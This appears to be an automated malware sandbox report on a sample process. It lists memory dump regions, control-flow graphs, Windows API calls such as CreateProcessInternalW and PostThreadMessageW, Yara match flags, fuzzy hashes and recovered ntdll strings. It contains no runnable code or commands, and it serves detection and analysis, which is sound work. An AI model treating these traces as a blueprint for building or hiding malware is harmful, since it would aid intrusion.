                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: fd9787aeb50f1c6cd1cb070f66de66b2eb230f171fa2648d1c0d1b1b0cff2167
                                                                                                                                    • Instruction ID: 68abb48020e70b0014dbbe737f4704db2e03933022dc2b0b36ce8c9bf0580811
                                                                                                                                    • Opcode Fuzzy Hash: fd9787aeb50f1c6cd1cb070f66de66b2eb230f171fa2648d1c0d1b1b0cff2167
                                                                                                                                    • Instruction Fuzzy Hash: BB90026520181803D140B5584904607001587D5302F55D011A2065555E8B298D516135
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 420 2a10c88-2a10ca1 421 2a10ca3-2a10ca9 420->421 422 2a10d0a-2a10d22 call 2a2bec0 420->422 421->422 425 2a10c7e-2a10c80 421->425 427 2a10d28-2a10d5a call 2a01410 call 2a21b60 422->427 428 2a10d23 call 2a14460 422->428 425->420 433 2a10d7a-2a10d80 427->433 434 2a10d5c-2a10d6b PostThreadMessageW 427->434 428->427 434->433 435 2a10d6d-2a10d77 434->435 435->433
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 02A10D67
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 1836367815-3456940251

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 436 2a10cf0-2a10d02 437 2a10d0a-2a10d22 call 2a2bec0 436->437 438 2a10d05 call 2a2b4b0 436->438 441 2a10d28-2a10d5a call 2a01410 call 2a21b60 437->441 442 2a10d23 call 2a14460 437->442 438->437 447 2a10d7a-2a10d80 441->447 448 2a10d5c-2a10d6b PostThreadMessageW 441->448 442->441 448->447 449 2a10d6d-2a10d77 448->449 449->447
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 02A10D67
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 1836367815-3456940251

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 450 2a10cac-2a10cb8 450->450 451 2a10cba-2a10cbd 450->451 452 2a10d20-2a10d5a call 2a14460 call 2a01410 call 2a21b60 451->452 453 2a10cbf-2a10cc9 451->453 460 2a10d7a-2a10d80 452->460 461 2a10d5c-2a10d6b PostThreadMessageW 452->461 453->452 461->460 462 2a10d6d-2a10d77 461->462 462->460
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 0-3456940251
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02A23AEB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                    • String ID: @J7<
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                    • String ID: @J7<
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A182AC
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A144D2
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A1823E,00000010,?,?,?,00000044,?,00000010,02A1823E,?,?,?), ref: 02A29753
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A09CE5
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A09CE5
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(02A11969,?,02A25DDF,02A11969,02A255FF,02A25DDF,?,02A11969,02A255FF,00001000,?,?,00000000), ref: 02A2964C
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D0A2AFD0,00000007,00000000,00000004,00000000,02A13D3E,000000F4), ref: 02A2969C
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A144D2
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A182AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                                                                                                    • Instruction ID: 4f84d1057b4c55c49d474dca2b1b21a8aa816cd2f1576ac0c59d4b238e155ff8
                                                                                                                                    • Opcode Fuzzy Hash: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                                                                                                    • Instruction Fuzzy Hash: F5E026352406082BFB286BACDD81FA2335C9B48738F480660BD3CCB2C2EA7CF8014190
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02A11C70,02A27F3E,02A255FF,02A11C36), ref: 02A180A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                                                                                                    • Instruction ID: f59f670476075384d8bcc90204d3eb8036f18066b300fda58921a98050280590
                                                                                                                                    • Opcode Fuzzy Hash: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                                                                                                    • Instruction Fuzzy Hash: 28E0C2716802086FFA20EBF8EC63FE5325D5B40364F044464B90CE72C2EE76A4518A65
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02A11C70,02A27F3E,02A255FF,02A11C36), ref: 02A180A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                                                                                                    • Instruction ID: 99d53b1e8645fc4cebb009fb91b9967cf59f01398b4ff029fda32b0c6f03ae49
                                                                                                                                    • Opcode Fuzzy Hash: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                                                                                                    • Instruction Fuzzy Hash: 85D05E712803083BF610B6E9DD56F96328D5B00764F444464BA0CE72C2EE66F05045A9
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                     • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: e9d4b39158139bdef385a84d0d9c12803c821864f089a2279879d7a2c815813e
                                                                                                                                    • Instruction ID: d9e208d3e2955e844e80399b110cdf7375adca1df5ea6be22c839a672f970029
                                                                                                                                    • Opcode Fuzzy Hash: e9d4b39158139bdef385a84d0d9c12803c821864f089a2279879d7a2c815813e
                                                                                                                                    • Instruction Fuzzy Hash: D5B09B719015D5C7DE11E7604708717791467D5701F29C465D2030641E4739C5D1E175
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135061035.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3090000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 025498aec11dcda84dc733139c27437218ec7e81399a40a62fefcf4651d99b5c
                                                                                                                                    • Instruction ID: 7bd72073a9434e569309cfb12e839f8a5909ae7854e7b06ea6af797d8fc3d897
                                                                                                                                    • Opcode Fuzzy Hash: 025498aec11dcda84dc733139c27437218ec7e81399a40a62fefcf4651d99b5c
                                                                                                                                    • Instruction Fuzzy Hash: 6541F97561AB0D4FE768EF6CD0816B7B3E1FB89300F50052ED88AC3652E774E8468745
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135061035.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3090000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                    • API String ID: 0-3558027158
                                                                                                                                    • Opcode ID: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                                                                                                    • Instruction ID: 64d7ffc4fadf4c3a3c51e27acb09b69973297c70f69852c106be3d0ae7110d35
                                                                                                                                    • Opcode Fuzzy Hash: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                                                                                                    • Instruction Fuzzy Hash: 419150F04482948ACB158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89059B85
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                     • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: 4e454c3c3e704914b3c95de469052631f5c5cdf6a70f2e94bbb3aa0cf770042e
                                                                                                                                    • Instruction ID: 5086db05a577ed83efaffe831368c66586d203ac9aaa0b9e76bfe593f7beec74
                                                                                                                                    • Opcode Fuzzy Hash: 4e454c3c3e704914b3c95de469052631f5c5cdf6a70f2e94bbb3aa0cf770042e
                                                                                                                                    • Instruction Fuzzy Hash: A251E6B6A10256BFCF14DB98889097EF7B8BF1D200B18856DE4A9D7641D374EE418BE0
                                                                                                                                    Strings
                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 031F4742
                                                                                                                                    • Execute=1, xrefs: 031F4713
                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 031F4725
                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 031F4655
                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 031F4787
                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031F46FC
                                                                                                                                    • ExecuteOptions, xrefs: 031F46A0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                     • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                    • API String ID: 0-484625025
                                                                                                                                    • Opcode ID: 717f892882a3a917457e9ae2e21a62a981c676ecab13d0b9972da59e13cccfdd
                                                                                                                                    • Instruction ID: 65ed34f64a19d10fad05985dffeb5acb79c488d46ce0b5fb48049b9cc25c59cf
                                                                                                                                    • Opcode Fuzzy Hash: 717f892882a3a917457e9ae2e21a62a981c676ecab13d0b9972da59e13cccfdd
                                                                                                                                    • Instruction Fuzzy Hash: 1E51F735A003197FEF25EAA5EC99FEE77B8AF4C700F0400A9D505AB1D1EB719A858F50
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                     • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-$0$0
                                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction ID: eb3f8b07ccb4863cc385fc1e1eb0cfe4acd04b0e7bfb4cc610a0e4ee9f88a5bf
                                                                                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction Fuzzy Hash: 35819F70E292D99BDF28CEA8C8527AEBBB5AF69310F1CC15DD851E73D1C73498808B51
                                                                                                                                    Strings
                                                                                                                                    • RTL: Re-Waiting, xrefs: 031F031E
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031F02BD
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031F02E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                     • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                     • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                    • Opcode ID: e1c5e55a1a96361048841ba798834a332ad038059b03f060ad8bf3db22e3f9ca
                                                                                                                                    • Instruction ID: e6641b33bd441a563b88d6d4f3593db94f148261a9c504fe5cb7d6b88d027487
                                                                                                                                    • Opcode Fuzzy Hash: e1c5e55a1a96361048841ba798834a332ad038059b03f060ad8bf3db22e3f9ca
                                                                                                                                    • Instruction Fuzzy Hash: 8DE1D078608B419FD725CF28C884B2AB7E0BF8C315F184A5DF5A58B2E1D774D886CB52
                                                                                                                                    Strings
                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 031F7B7F
                                                                                                                                    • RTL: Re-Waiting, xrefs: 031F7BAC
                                                                                                                                    • RTL: Resource at %p, xrefs: 031F7B8E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 0-871070163
                                                                                                                                    • Opcode ID: 71446cad3db5ca56521bfa31cdbc40a80505588d8b578ce1f753914e013d3b9d
                                                                                                                                    • Instruction ID: f60cd72098900620f899434db0ba763d629e578ac2f32d8581bd048acabf8375
                                                                                                                                    • Opcode Fuzzy Hash: 71446cad3db5ca56521bfa31cdbc40a80505588d8b578ce1f753914e013d3b9d
                                                                                                                                    • Instruction Fuzzy Hash: BE4102353087029FD724DE25C840BAAB7E5EF8D710F044A1DF99ADBA80DB71E445CB91
                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031F728C
                                                                                                                                    Strings
                                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 031F7294
                                                                                                                                    • RTL: Re-Waiting, xrefs: 031F72C1
                                                                                                                                    • RTL: Resource at %p, xrefs: 031F72A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                                    • Opcode ID: b8487de6e767305af88ba3bf0bf17e543ea274552b8fc84dc3678e7c419c57bf
                                                                                                                                    • Instruction ID: aaa68e9a47590b78ae3ebaed57abe45c669eb152d4d931dc93385b32ac9036bd
                                                                                                                                    • Opcode Fuzzy Hash: b8487de6e767305af88ba3bf0bf17e543ea274552b8fc84dc3678e7c419c57bf
                                                                                                                                    • Instruction Fuzzy Hash: 62411F35608202AFC720DE25CC41FAAB7A5FB8C750F144A18F956AB680DB30E896CBD1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-
                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction ID: 22294aa9655ff7fd1ce6aac20b28749acac325c7802ec4085907fbbd74b3a9e4
                                                                                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction Fuzzy Hash: CD91C371E202899FDB24DE69C8D06BEB7A5AF6C720F18451EE875E72C0D7B08991CF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $$@
                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                    • Opcode ID: e076330367d181eb2e87721d914c4b442e8f96602684b04610c58fd192afcd69
                                                                                                                                    • Instruction ID: 4fccbf0c6dcd5618e331fe8a5681c799a08a815a6e8504547ad4766c38a3b21e
                                                                                                                                    • Opcode Fuzzy Hash: e076330367d181eb2e87721d914c4b442e8f96602684b04610c58fd192afcd69
                                                                                                                                    • Instruction Fuzzy Hash: 77814975D006699BDB25EB54CC44BEEB7B8AF0C710F0445EAE919B7280E7309E85CFA4